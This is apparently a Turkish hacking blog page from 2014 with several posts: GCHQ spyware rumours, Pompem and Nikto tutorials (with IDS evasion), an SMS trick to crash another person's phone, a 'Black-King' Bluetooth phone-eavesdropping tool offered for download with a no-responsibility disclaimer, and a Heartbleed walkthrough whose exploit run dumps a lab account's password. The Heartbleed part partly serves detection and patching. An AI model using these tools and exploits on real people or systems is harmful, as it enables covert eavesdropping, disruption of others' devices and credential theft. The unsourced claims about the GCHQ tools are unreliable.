7 Ağustos 2014 Perşembe

İngiliz İstihbarat Servisi GCHQ ‘nın Kullandığı 5 Casusluk Uygulaması

Paylaşım Unknown on 17:30 with Şuan Yorum Yok
siber istihbarat
Selamlar Dostlar;
Yıl 2014. Bilgi ve İstihbarat konusunda tüm Dünya’nın gözü kulağı artık Siber Dünya’da. Bundan 5, 10 yıl önce Aksiyon, Macera türünde filmlerde izlediğimiz hemen hemen her şey artık Teknoloji dünyasında yer alıyor ve İstihbarat Servisleri tarafından aktif olarak kullanılıyor.
Siber Dünya’nın karanlık tarafıyla ve Hacking işleriyle ilgilenen tarafları sayın bana desem? White hat hackerler, Black hat hackerler, Gray hat hackerler dersiniz. Ancak Günümüzde artık Kategorisel olarak baz alınması ve Bilinmesi gereken bir taraf daha var. Ve bu taraf diğer tüm taraflardan daha GÜÇLÜ, daha ACIMASIZ ve daha fazla İMKANA SAHİP!
“DEVLETLERİN İSTİHBARAT SERVİSLERİ!”
Önce WikiLeaks, daha sonra NSA Skandallarının ardından ortaya çıkan belgelere baktığımız zaman hep devletlerin kendi vatandaşlarını ya da diğer devletlerin yöneticilerini, istihbarat servislerini dinlemek için Teknolojiler geliştirdiklerini ve kullandıklarını görürüz. Özellikle Snowden’ın sızdırdığı NSA Belgelerinde açıkça görülüyordu ki, Amerika ve İngiltere kantarın topunuzu oldukça abartmış dinlemedikleri ülke ve yönetici yada servis kalmamıştı.
Yani artık insanlar sadece Beyaz, Siyah, Gri Şapkalı hackerlerin değil, Devletlerin Gizli Servislerinin de Hedefinde yer alıyor! Üstelik dedğim gibi bu adamların paraya, cihaza, teknolojiye, adama ve dolayısıyla paraya ihtiyaçları yok. Her şey ellerinin altında. Para var, Mekan var, Cihaz var, Kanun zaten kendileri ;) Anlayacağınız Tehlikenin boyutu oldukça yüksek.
Herksin bildiği NSA gibi çalışan ancak ülke olarak İngiltere’de yer alan ve bu yazıya konu olan Gizli Servisimizin adı GCHQ. Belkide çoğunuz bu ismi yani baş harflerinden oluşan bu GCHQ tanımlamasını yeni duydunuz. Ancak kendileri İngiliz İstihbaratının bel kemiği durumundalar. Kendilerini Modern her türlü Teknolojiyi kullanarak her türlü ortam, şart ve koşulda İngiliz Devleti ve Vatandaşlarının Güvenli İletişim Kurmasını sağlamak amaçlı Faaliyetler yapmak ve bunları yaparken İstihbarat kardeşliği kurdukları bir diğer İngilizlerin genel istihbarat servisi (Bizdeki MİT gibi) MI5 ile Bilgi Paylaşımı yapmak olarak tanımlıyorlar.
Yani bu adamlar Teknoloji İstihbaratı yapıyorlar. Diğer İstihbarat Servislerinden farkları bu. NSA ile de ortak yanları bu. Doğrudan ajanlık ve casusluk faaliyetleri Siber Dünya hedefli.
GCHQ ‘nun gündeme gelmesi NSA Skandallarında oldu. Benimde kendilerinin yaptığı işleri araştırmam yine bu dosyalar sayesinde oldu.
Yaptığım araştırmalara ve medyada siber dünyada dönen dökümanlara göre bu zathı muhterem GCHQ Servisi aşağıdaki 5 adet Hack Tool Programını Casusluk yapmak üzere kendileri yazıp, Siber Dünya’ya salıyorlar. Yani bir Hacker gibi Hacking yapmanızı sağlayan Yazılımları üretip, İçlerine BackDoor yerleştirip, piyasa salıyorlar.
Amaç ne ?
Tabii ki DATA toplamak. Programları kimler ne için nereden ne zaman kullanıyor? Her türlü data GCHQ tarafından toplanıyor. Ve siz o Programları kullanırken sanıyorsunuz ki bizde hackeriz ve güvendeyiz.
Yani “AVA GİDEN AVCIYI AVLIYORLAR!”
GCHQ adına çalışan Casus Hack Yazılımları şu şekilde ;
1-       Nosey Smurf : Angry Birds gibi bir Mobil oyun düşünün. Ancak bu Kuşlardan falan değil, Bildiğimiz Şirinlerden oluşuyor. Nosey Smurf mobil yazılımını indirdiğiniz zaman Cep Telefonunuzun GPS, SMS, Telefon görüşmeleri gibi bilgilerini GCHQ’ya gönderiyorsunuz. En çok da bu programdan MİKROFON ORTAM DİNLEMESİ yapmak gibi konularda ekmek yemişler.
2-       GumFish : Bu da Mobil tabanlı bir yazılım. Her şeyi yapmasından ziyade Kamera görüntüsü üzerine odaklanılmış.
3-       FoggyBottom : Internet arama geçmişlerini kayıt edip gönderen bir Yazılım.
4-       Tracker Smurf : Kullandığı kişinin Çoğrafi Bilgilerini gönderen bir Yazılım.
5-       Grok : Bildiğiniz Keylogger. Ama sizi de avlıyor.
Durum böyle dostlar. Bunlar çok bilinenler. Elbetteki asıl ÇOK BİLİNMEYENLERİ bilmiyoruz. Siber Dünya gün geçtikçe büyüyor. Hiç durmuyor. Ve hiç durmayacak.
Yeni bir makale ile daha sizlerle olana kadar kendinizi Güvenli kılmaya bakın.

4 Ağustos 2014 Pazartesi

Pompem Exploit Finder (exploit-db , 1337day tarama vb.) Kali linux.

Paylaşım Unknown on 13:31 with Şuan Yorum Yok
Merhabalar Arkadaşlar;
Bugün sizlere Kali Linux’ta “Pompem  Exploit  Finder Tool”’unu tanıtacağım. Pompem büyük veritabanlarında (exploit-db , 1337day vb.) otomatik olarak exploit araştırmak üzere tasarlanmış açık kaynak kodlu bir araçtır. Python diliyle yazılmıştır ve gelişmiş bir arama sistemi mevcuttur, dolayısıyla pentester ve ethical hackerların işini oldukça kolaylaştırmaktadır. Meccut versiyonda çeşitli veri tabanlarında aramalar gerçekleştirir , bunlar: Exploit-db, 1337day, Packetstorm Security gibi sitelerdir.
Öncelikle buradan(http://www.mediafire.com/download/w5qoqzqb6fjrdqb/Pompem-master.zip) pompem tool’unu Kali Linux masaüstünüze indirin. Dosya .zip formatında indi.
Öncelikle terminal penceresini açıyoruz ve cd Desktop komutulya masaüstü dizinine geliyoruz.
Şimdi ise unzip Pompem-master.zip komutuyla pompem’i zip’ten ççıkarıyoruz.
Pompem Exploit Finder Tool
zip’ten çıktığına dair görüntü;
Pompem Exploit Finder Tool
Evet artık tool’umuz kullanıma hazır hale geldi. Terminal penceresini kapatıp tekrardan açalım.
cd Desktop komutuyla masaüstü dizinine geçiyoruz.
Pompem Exploit Finder Tool
Şimdi Pompem’i kullanbilmek için cd Pompem-master komutuyla Pompem dizinine geçelim.
Pompem Exploit Finder Tool
Pompem’in çalıştığına dair görüntü;
Pompem Exploit Finder Tool
Artık rahatlıkla amacımıza göre kullanabiliriz.Kullanım şekli python pompem-master.py -s arayacağımız_degisken şeklinde olacak. Biz burada python pompem-master.py -h komutunu vererek nasıl kullanabileceğimiz öğrenebiliriz.
Pompem Exploit Finder Tool
Wordpress için gösterelim;
python pompem-master.py -s Wordpress komutunu verdiğimizde gördüğünüz gibi aramanın gerçekleştiğine dair yazımız çıktı.
Pompem Exploit Finder Tool
Bu fotoğrafta ise sonuçlar çıktı;
Pompem Exploit Finder Tool
Joomla için gösterelim;
python pompem-master.py -s Joomla komutunu verdiğimizde gördüğünüz gibi aramanın gerçekleştiğine dair yazımız çıktı ve sonuçlarımız gözüktü;
Pompem Exploit Finder Tool
Linux için gösterelim;
python pompem-master.py -s Linux komutunu verdiğimizde gördüğünüz gibi aramanın gerçekleştiğine dair yazımız çıktı ve sonuçlarımız gözüktü;
Pompem Exploit Finder Tool
Bu şekilde kullandığımız sisteme ait exploit olup olmadığını anlayabiliriz.

Nikto ile Zafiyet (Açık) Tarama

Paylaşım Unknown on 12:56 with Şuan Yorum Yok
Nikto CIRT tarafından yapılmış açık kaynak kodlu, Web Uygulama Zafiyet Aracıdır. Bu araç Kali ve Backtrack işletim sistemlerine kurulu olarak gelmektedir. Diğer Linux Dağıtımları için aşağıda ki link’den indirip kurabilirsiniz. Nikto aşağı yukarı 6500 zafiyet tespit’i yapabilir.

Adresinden indirebilirsiniz.
Anlatımı ben Backtrack üzerinden yapacağım.
1.png
Nikto yazılımına Terminal’den girmek isterseniz bu şekilde gireceksiniz. Normal menülerden girecekseniz ise bu şekilde.3.png
Nikto Aracımızın Arayüzü arkadaşlar.
4.png
Öncelikle bi hedef site’de basit bir tarama yapalım.

5.png
Şimdi bir site’de SQL, XSS gibi açıklar arayalım.
Terminal’e perl nikto.pl -H yazıp help komutunu yansıtacağız.

6.png
Zafiyet çeşitleri biz SQL zafiyeti arayacağız. O yüzden 9 numara. :)

7.png
Birşey tespit edemedi.
Nikto Komutları
-host+ ---> hedef site
-port+ ---> hedef port (default 80)
-evasion ---> IDS’ ten kaçınma özelliği. -e parametresinden sonra Encoding technique: altındaki parametrelerden kullanılmak istenilen yazılır
-tuning ---> tarama şeklini belirler. SQL mi tarayacaksınız, XSS mi tarayacaksınız onu belirler. sadece zafiyet tarar.
-CgiDirs+ ---> CGI dizinleri tarar. Eğer taramasını istemezseniz none komutunu kullanacaksınız.
-verbose ---> ayrıntılı tarama yapar.
-update ---> yazılım güncellemesi
-generic ---> Full tarama yapar. Eğer site log tutarsa yakalanma ihtimaliniz çok yüksek o yüzden pek tavsiye etmiyorum.

General Mobile Discovery ‘e Uzaktan Reset Atma.

Paylaşım Unknown on 12:17 with Şuan Yorum Yok
Öyle uzun uzun anlatmaya gerek yok.
General Mobile Discovery Telefonu olan birisine SMS olarak şunu gönderin ;

“ = “ (tırnaklar yok)
Cihaz önce Reset atacak, daha sonra İngilizce dil seçeneği ile açılacak ve sonra Türkçe Dil Seçeneğine dönüş yaparak biraz kasılarak kendine gelecektir.
Bu işlem Telefonda kalıcı bir zarar bırakmadığı gibi, SD Kart yada Telefon Hafızasından da Veri kaybı yaşanmasına neden olmamaktadır.
Cihazın “=” sembolüne karşı verdiği tepkiyi anlamakta güçlük çekmekle birlikte piyasada var olan General Mobile Discovery modellerinin hepsinde işe yaramaktadır. Ayrıca Android işletim sistemini güncelleseniz dahi problem devam etmektedir.
Açık linux ile bulunup hala devam etmekdetir.

Bilgi ve guvenligi akademisi



Şifreli Haberleşmenin Yenisi: “BitTorrent Bleep Messenger”

Paylaşım Unknown on 11:58 with Şuan Yorum Yok

Malumunuz Dünya üzerinde artık Gizlilik, Güvenlik ve Mahremiyet gibi kavramların daha çok sorgulandığı, kırmızı çizgilerin daha da keskinleştiği günlerden geçiyoruz. Edward Snowden abimizin Nation Security Agency (NSA) ‘in belgelerini ifşa etmesiyle zaten bildiğimiz ama millete anlattığımız da “abi sen çok Amerikan filmi izliyorsun” dediği olayların herkes tarafından bilinmesi bizim Güvenlik, Gizlilik gibi konuları daha çok aydınlatmamıza ve Konuya daha çok farkındalık katmamıza olanak sağladı.
bleep messenger
Devletler, kendi vatandaşlarını dinlemek için her türlü yola başvurmuşken, Siber İstihbarat gün ve gün değerli hale geldi. Teknolojinin nimetlerinden yararlanmak ve teknolojiye kendi çıkarları doğrultusunda kullanmak isteyen Devletler, kendi istihbarat vb. birimleri sayesinde bu işlere imza attılar.
Durum böyleyken sadece Teknolojinin nimetlerinden yararlananlar tabi ki devletler yada özel istihbarat servisleri değil. Bizler de varız işin içinde. Yani Siber Dünya’nın gerçek sahipleri, bu dünyayı yaşayanlar var.
BitTorrent ‘i herkes kullanır bizim buralarda. Herkeste bilir ne olduğunu. İstediğiniz bir Program, Data ne varsa BitTorrent üzerinden rahatlıkla dağıtık server yapısı sayesinde kimliğiniz ve bağlantı adresiniz belli olmadan çekebilirsiniz.
BitTorrent’in yapımcıları yeni bir hizmet ile karşımızdalar. Bleep ismini verdikleri bu yazılım sayesinde Şifreli konuşmalar yani Chat yapmak mümkün hale geliyor. Messenger mantığınıda düşünebilirsiniz yazılımı.
Peki Bleep Nasıl Güvenlik Sağlıyor?
Yapımcısının dediğine göre olay aynı TOR trafiğinda ki Node noktalarından geçerken atılan Düğümlere benziyor dostlar. Siz Bleep üzerinden bir kişiyle sohbete başladığınız zaman arka planda metadata bilgisi, ip bilgisi vb aklınıza gelebilecek her türlü data ve bilgi bir Düğüm noktasına gidiyor ve şifreleniyor. Oradan başka bir düğüm noktasına geçerken yine şifreleniyor. Yani anlık sohbet trafiğiniz sürekli şifreli hale gelmiş durumda oluyor.
Bleep Yazılımının mantığında Mimariyi oluştururken iki önemli unsur var. Birisincisi Oturum Başlatma Protokolünün Şifrelenmesi İkincisi ise Bu Oturum başlatma katmanına eklenmiş ve Şifrelenmiş olan Peer-To-Peer metodu.
Bleep Hangi Ortamlarda Çalışıyor ?
Bleep yazılımı Desktop, Mobil, Email gibi her servis ve ortamda çalışıyor dostlar.
Bleep ‘i Nasıl Deneyebiliriz, Nasıl Bilgi alabiliriz ?
http://labs.bittorrent.com/experiments/bleep/ şuraya gidip daha fazla şeyler okuyabilir, Kayıt olabilir, İnceleyebilirsiniz.

31 Temmuz 2014 Perşembe

'Black-King ! Telefon Dinleme

Paylaşım Unknown on 08:57 with Şuan Yorum Yok
Uzun zamandır düzenlediğim bana ait olmayan ancak upload , apk , wındows , ıos düzenlemelerını yapmakla uğraşıyordum.

Bu gün facebook sayfam üzerinden saçma sapan paylaşmıcak bizi oyalıyor yazılarını okuyunca dayanamadım v0.1 versıyonu ıle sızlere sunuyorum.

Download Link Ve Virüs Totaller ;

www.turkhackteam.net

Download Dosya.Tc
Download Dosyalama
Vırus Total Jottı

Aslında apksı bıtmeden paylaşmıyacaktım ancak çok aşırı yoğun ıstekler aldım.
Sürümün Kullanımı ;

.jar dosyasını telefonunuza atın.
Menüden Bluetooth'u seçıp etraftakı telefonları taratın.
Ardından karşınıza çıkana tıklayın ve sms yada telefonunu dınleyın.

www.turkhackteam.net
Iyı kullanımlar dilerim - saygılar

www.turkhackteam.net


Bir Teşekkür Yeterlidir..


Androıdcılere duyurulur.
.Jar dosyalarını açmak ıçın google playda uygulamalar mevcut. Onları araştırıp onlarla androıdlerde açabılırsınız.



Antı vırusler vırus buluyormuş
Vırusun adı :


MonitoringTOOL/JavaHack

Doğaldır çünkü telefon dınleme ancak zararlı bır vırus değıldır. bilginize..







////


Program kullanıcıları tamamen anonimdir. Ve dinlenen telefonlar anonimler tarafından tamamen rast gele dinlenmektedir. Program yazarı veya düzenleyicisi (Geliştırıcısı) Sorumlu Tutulamaz. Kullanıcılar Anonim Olduğundan , Kullanıcıların
Kimliği bilinmemektedir. Projeyle Dinleme Yapılasından Telif Hakları Gereği TurkHackTeaM Ve 'Black-King Sorumlu Değıldır..

9 Mayıs 2014 Cuma

Nmap, Nessus, Metasploit Kullanarak OpenSSL Heartbleed AÇIĞI

Paylaşım Unknown on 06:08 with 1 comment
TLS’in heartbeat eklentisindeki bir programlama hatasından kaynaklanan sorun sayesinde internete açık zafiyet içeren OpenSSL sürümünü kullanan herhangi bir sistemin belleğindeki bilgiler 64 kbyte’lık bölümler halinde alınabilmektedir.

Açık, internet üzerinden herhangi yetki gerektirmeksizin tcp 443. porttan kurulan bağlantılar üzerinden(başka portlarda çalışan TLS destekli protokollerde dahil) şifrelemede kullanılan private key’lerin, kullanıcı adı ve şifrelerin, cookie’lerin ve benzer her türlü hassas verinin alınabilmesine olanak sağladığından dolayı, OpenSSL’in 1.0.1 – 1.0.1f arası sürümlerini kullanan sistemlerin bir an önce açığın bulunmasının hemen ardından yayınlanan OpenSSL 1.0.1g sürümüne terfi etmeleri, bu işlem yapılamıyorsa da mevcut OpenSSL’in “-DOPENSSL_NO_HEARTBEATS” parametresi ile yeniden derlenerek heartbeat özelliğini devre dışı bırakmaları önerilmektedir.
İlgili zafiyeti gideren güncelleme paketleri, CentOS, Debian ve FreeBSD paket depolarına eklendi. Bu nedenle ilgili sistemleri kullanıyorsanız acilen sistem update’i edilmelidir. Ayrıca, sistem güncellemesine kadar geçen süreç içerisinde SSL anahtarlarınızın alınıp alınmadığını bilemeyeceğiniz için mevcut anahtarların da revoke edilerek yenilerinin üretilmesi yerinde olacaktır.
Açıklıktan Etkilenen Sistemler
  • Debian Wheezy (stable), OpenSSL 1.0.1e-2+deb7u4
  • Ubuntu 12.04.4 LTS, OpenSSL 1.0.1-4ubuntu5.11
  • CentOS 6.5, OpenSSL 1.0.1e-15
  • Fedora 18, OpenSSL 1.0.1e-4
  • OpenBSD 5.3 (OpenSSL 1.0.1c 10 May 2012) ve 5.4 (OpenSSL 1.0.1c 10 May 2012)
  • FreeBSD 10.0 - OpenSSL 1.0.1e 11 Feb 2013
  • NetBSD 5.0.2 (OpenSSL 1.0.1e)
  • OpenSUSE 12.2 (OpenSSL 1.0.1c
  • Red Hat Enterprise Linux 6.5, Red Hat Enterprise Virtualization Hypervisor 6.5, and Red Hat Storage 2.1
Açıklığın ortaya çıkmasından sonra istismarı için bir takım istismar araçları yayınlandı. Bağımsız olarak geliştirilen exploit’lerin yanısıra Nessus, nmap, metasploit gibi en sık kullanılan güvenlik araçları da  açıklığı tespit tmek amaçlı kendilerini güncelleyerek gerekli script’leri kütüphanelerine eklediler.
İlk olarak nmap port tarama aracının yayınlamış olduğu script’i kullanarak yerel ağda açıklıktan etkilenen sistemlerin olup olmadığını kontrol edelim.


Nmap NSE Kullanarak HeartBleed Zafiyetini Tespit Etme


# nmap -p 443 --script ssl-heartbleed 6.6.6.0/24


Nmap scan report for 6.6.6.251
Host is up (0.0022s latency).
PORT    STATE SERVICE
443/tcp open  https
| ssl-heartbleed:
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|       http://www.openssl.org/news/secadv_20140407.txt
|_      http://cvedetails.com/cve/2014-0160/


Nmap scan report for 6.6.6.247
Host is up (0.0020s latency).
PORT    STATE SERVICE
443/tcp open  https
| ssl-heartbleed:
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|       http://www.openssl.org/news/secadv_20140407.txt
|_      http://cvedetails.com/cve/2014-0160/


Tablodaki port tarama sonuçlarına bakılacak olursa 6.6.6.0(6.6.6.0/24 ağı BGA'nın kullandığı sızma testi lab. sistemlerine aittir) alt ağında açıklıktan etkilenen 2 tane makinenin olduğu görülmektedir. 
Açıklığı istismar etmek için geliştirilmiş exploitler kullanılarak hedef sistem belleğindeki hassas verilere erişmek mümkün olacaktır.


Nessus ile ‘heartbleed’ Taraması Gerçekleştirme


Diğer bir zaafiyet tarama aracı olan Nessus, OpenSSL’de bulunan bu güvenlik açığı karşısında kendisini güncellemiştir. Nessus ile örnek bir heartbleed taraması aşağıdaki gibi yapılabilir.


Heartbleed taraması yapabilmek için, ilk olarak ‘Heartbleed Detection’ politikası oluşturulmalıdır.


Policy oluşturmaScreen Shot 2014-04-14 at 17.38.11.png



Oluşturulan bu politika kullanılarak tarama başlatılır.


Taramayı BaşlatmaScreen Shot 2014-04-14 at 17.39.53.png



Eğer hedef sistem açıklıktan etkilenmiş ise , nessus bu durumu tespit edecek ve aşağıdaki ekran görüntüsünde olduğu gibi rapor sunacaktır.

Screen Shot 2014-04-14 at 17.30.33.png



Metasploit ile Heartbleed Testi


En çok kullanılan güvenlik araçlarından biri olan Metasploit, OpenSSL’de bulunan bu güvenlik açığı karşısında ilgili güncellemeyi yaptı.Aşağıdaki örnekte Metasploit kullanarak hedef sistemin açıklıktan etkilenip etkilenmediği kontrol edilmiştir.

NOT:Metasploit ve Nessus sadece HTTPS değil diğer SSL kullanan portları da test edip tespit edebilmektedir.


msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(openssl_heartbleed) > show options


Module options (auxiliary/scanner/ssl/openssl_heartbleed):


  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  RHOSTS                       yes       The target address range or CIDR identifier
  RPORT       443              yes       The target port
  STARTTLS    None             yes       Protocol to use with STARTTLS, None to avoid    STARTTLS  (accepted: None, SMTP, IMAP, JABBER, POP3)
  THREADS     1                yes       The number of concurrent threads
  TLSVERSION  1.1              yes       TLS version to use (accepted: 1.0, 1.1, 1.2)


msf auxiliary(openssl_heartbleed) > set RHOSTS 6.6.6.251
RHOSTS => 6.6.6.251
msf auxiliary(openssl_heartbleed) > run


[+] 6.6.6.251:443 - Heartbeat response with leak
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed



Heartbleed İstismar Scripti


Açıklığı tespit ettikten sonra, istismar etmek için https://github.com/musalbas/heartbleed-masstest/blob/master/ssltest.py adresinde bulunan exploit kullanılabilir.Örnek bir uygulama aşağıdaki gibidir.


# python ssltest.py 6.6.6.251 -p 443
username=bg
0290: 65 6E 76 70 6E 26 70 61 73 73 77 6F 72 64 3D 50 alab&password=P
02a0: 64 62 37 34 63 70 38 63 6C 72 A9 4B 76 27 B9 A8 as12cp8bga.Kv'..
02b0: 9D 29 59 C4 54 4A 16 06 75 3B 00 00 00 00 00 00 .)Y.TJ..u;......
username: bgalab
pass: Pas12cp8bga


Pacemaker ile İstemci(Browser) Sistemlerin HeartBleed Testi
OpenSSL’de bulunan bu güvenlik açığı, sadece sunucu tarafını etkilemekle kalmayıp sunucu ile iletişime geçen istemcileride etkilemektedir. Böyle bir durumdan etkilenip etkilenmediğinizi https://github.com/Lekensteyn/pacemaker adresinde bulunan araç ile test edebilirsiniz.


Önce sunucuyu çalıştırın.
python pacemaker.py


Daha sonra istemci bilgisayar üzerinde https://localhost:4433/  adresine gidin.
curl https://localhost:4433/


İstemci bağlantı hatası verecektir.
curl: (35) Unknown SSL protocol error in connection to localhost:4433


Eğer açıklıktan etkilenmemiş iseniz sunucu çıktısı aşağıdaki gibi olacaktır.
root@kali:~/Desktop/pacemaker# python pacemaker.py
Listening on :4433 for tls clients
Connection from: 127.0.0.1:36725
Did not receive heartbeat response! [Errno 104] Connection reset by peer
Possibly not vulnerable


Eğer açıklıktan etkilenmiş iseniz sunucu çıktısı aşağıdaki gibi olacaktır.
Connection from: 127.0.0.1:40738
Client returned 65535 (0xffff) bytes
0000: 18 03 03 40 00 02 ff ff 2d 03 03 52 34 c6 6d 86  ...@....-..R4.m.
0010: 8d e8 40 97 da ee 7e 21 c4 1d 2e 9f e9 60 5f 05  ..@...~!.....`_.
0020: b0 ce af 7e b7 95 8c 33 42 3f d5 00 c0 30 00 00  ...~...3B?...0..
0030: 05 00 0f 00 01 01 00 00 00 00 00 00 00 00 00 00  ................
0040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
*
4000: 00 00 00 00 00 18 03 03 40 00 00 00 00 00 00 00  ........@.......
8000: 00 00 00 00 00 00 00 00 00 00 18 03 03 40 00 00  .............@..
...
e440: 1d 2e 9f e9 60 5f 05 b0 ce af 7e b7 95 8c 33 42  ....`_....~...3B
e450: 3f d5 00 c0 30 00 00 05 00 0f 00 01 01 00 00 00  ?...0...........
fff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ...............


Eğer kendi sistemlerinizde bu testi gerçekleştirmek isterseniz aşağıdaki adımları izleyebilirsiniz.


İlk olarak pacemaker.py scriptini çalıştırın.
python pacemaker.py


Daha sonra yine  istemci bilgisayar üzerinden aşağıdaki komutu çalıştırın.
wget -O /dev/null https://google.com https://localhost:4433



Eğer açıklıktan etkilenmiş iseniz çalıştırılan pacemaker.py scripti aşağıdaki gibi bir çıktı verecektir.


Connection from: 127.0.0.1:41914
Client returned 65535 (0xffff) bytes
0000: 18 03 03 40 00 02 ff ff 2d 03 03 52 34 c6 6d 86  ...@....-..R4.m.
0010: 8d e8 40 97 da ee 7e 21 c4 1d 2e 9f e9 60 5f 05  ..@...~!.....`_.
0020: b0 ce af 7e b7 95 8c 33 42 3f d5 00 c0 30 00 00  ...~...3B?...0..
0030: 05 00 0f 00 01 01 65 0d 0a 43 6f 6e 74 65 6e 74  ......e..Content
0040: 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c  -Type: text/html
0050: 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d  ; charset=UTF-8.
...
0b50: 01 05 05 07 02 01 16 2d 68 74 74 70 73 3a 2f 2f  .......-https://
0b60: 77 77 77 2e 67 65 6f 74 72 75 73 74 2e 63 6f 6d  www.geotrust.com
0b70: 2f 72 65 73 6f 75 72 63 65 73 2f 72 65 70 6f 73  /resources/repos
0b80: 69 74 6f 72 79 30 0d 06 09 2a 86 48 86 f7 0d 01  itory0...*.H....
0b90: 01 05 05 00 03 81 81 00 76 e1 12 6e 4e 4b 16 12  ........v..nNK..
0ba0: 86 30 06 b2 81 08 cf f0 08 c7 c7 71 7e 66 ee c2  .0.........q~f..
0bb0: ed d4 3b 1f ff f0 f0 c8 4e d6 43 38 b0 b9 30 7d  ..;.....N.C8..0}
0bc0: 18 d0 55 83 a2 6a cb 36 11 9c e8 48 66 a3 6d 7f  ..U..j.6...Hf.m.
0bd0: b8 13 d4 47 fe 8b 5a 5c 73 fc ae d9 1b 32 19 38  ...G..Z\s....2.8
0be0: ab 97 34 14 aa 96 d2 eb a3 1c 14 08 49 b6 bb e5  ..4.........I...
0bf0: 91 ef 83 36 eb 1d 56 6f ca da bc 73 63 90 e4 7f  ...6..Vo...sc...
0c00: 7b 3e 22 cb 3d 07 ed 5f 38 74 9c e3 03 50 4e a1  {>".=.._8t...PN.
0c10: af 98 ee 61 f2 84 3f 12 00 00 00 00 00 00 00 00  ...a..?.........
0c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
*
4000: 00 00 00 00 00 18 03 03 40 00 00 00 00 00 00 00  ........@.......
...
ffd0: 00 00 00 00 5c d3 3c 02 00 00 00 00 49 53 4f 36  ....\.<.....ISO6
ffe0: 34 36 2d 53 45 2f 2f 00 53 45 4e 5f 38 35 30 32  46-SE//.SEN_8502
fff0: 30 30 5f 42 2f 2f 00 00 00 00 00 00 00 00 00     00_B//.........